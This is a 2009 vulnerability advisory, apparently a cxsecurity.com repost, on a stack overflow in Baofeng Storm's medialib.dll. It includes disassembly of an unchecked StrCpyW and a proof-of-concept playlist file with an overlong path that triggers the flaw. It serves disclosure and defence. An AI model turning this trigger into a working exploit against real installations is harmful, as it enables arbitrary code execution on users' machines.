Baofeng Media Player playlist stack overflow vulnerability

2009.06.29
Credit: Jambalaya .
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Baofeng Media Player playlist stack overflow vulnerability By Jambalaya of Nevis Labs Date: 2009.06.24 Vender: Baofeng Affected: Storm 3.9.62 *Other version may also be affected Overview: Baofeng is a widely popular media player in China, and it plays many common media file formats. There are almost 120 million customer using baofeng media player in China. Details: The specific flaws exists in medialib.dll. the stack overflow vulnerablility is due to the way it incorrectly handle smpl file type which is a playlist.Succssfully exploiting this vulnerability allows attackers to execute arbitrary code on vulnerable installation. the vulnerability could be triggered when it pass a long path, and lack legal examine on the length of path&#163;&#186; .text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath) .text:1000567B sub_1000567B proc near ; DATA XREF: .rdata:100248D4o .text:1000567B .text:1000567B FileName = word ptr -628h .text:1000567B var_10 = dword ptr -10h .text:1000567B var_C = dword ptr -0Ch .text:1000567B var_4 = dword ptr -4 .text:1000567B pszUrl = dword ptr 8 .text:1000567B pcchPath = dword ptr 0Ch .text:1000567B .text:1000567B mov eax, offset sub_100221F8 .text:10005680 call __EH_prolog .text:10005685 sub esp, 61Ch .text:1000568B push ebx .text:1000568C push esi .text:1000568D mov esi, [ebp+pszUrl] .text:10005690 mov [ebp+var_10], ecx .text:10005693 test esi, esi .text:10005695 jz loc_1000577D .text:1000569B mov ebx, [ebp+pcchPath] .text:1000569E test ebx, ebx .text:100056A0 jz loc_1000577D .text:100056A6 push edi .text:100056A7 push esi ; pszPath .text:100056A8 xor edi, edi .text:100056AA mov [ebp+pcchPath], 208h .text:100056B1 call ds:PathIsURLW .text:100056B7 test eax, eax .text:100056B9 jz short loc_100056E0 .text:100056BB push 3 ; UrlIs .text:100056BD push esi ; pszUrl .text:100056BE call ds:UrlIsW .text:100056C4 test eax, eax .text:100056C6 jz short loc_100056E0 .text:100056E0 loc_100056E0: ; CODE XREF: sub_1000567B+3Ej .text:100056E0 ; sub_1000567B+4Bj .text:100056E0 lea eax, [ebp+FileName] .text:100056E6 push esi .text:100056E7 push eax .text:100056E8 call ds:StrCpyW <---------------------strcpy directly with out any examiation. Proof of concept&#163;&#186; <playlist><item name="2.GIF" source="C:Documents and SettingsLinlin&#192;&#195;&#230;2.GIF" duration="0"/><item name="0001.gif" source="C:Documents and SettingsLinlin&#192;&#195;&#230;rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" duration="0"/></playlist> Greetz to those friends who I have long time no see T_T&#163;&#186;Pratik Dixit, Sanjay pendse, Winny Thomas, ajit.hatti Vendor Response: 2009.06.16 Vendor notified via email 2009.06.25 Vendor release new version

References:

http://seclists.org/fulldisclosure/2009/Jun/0276.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top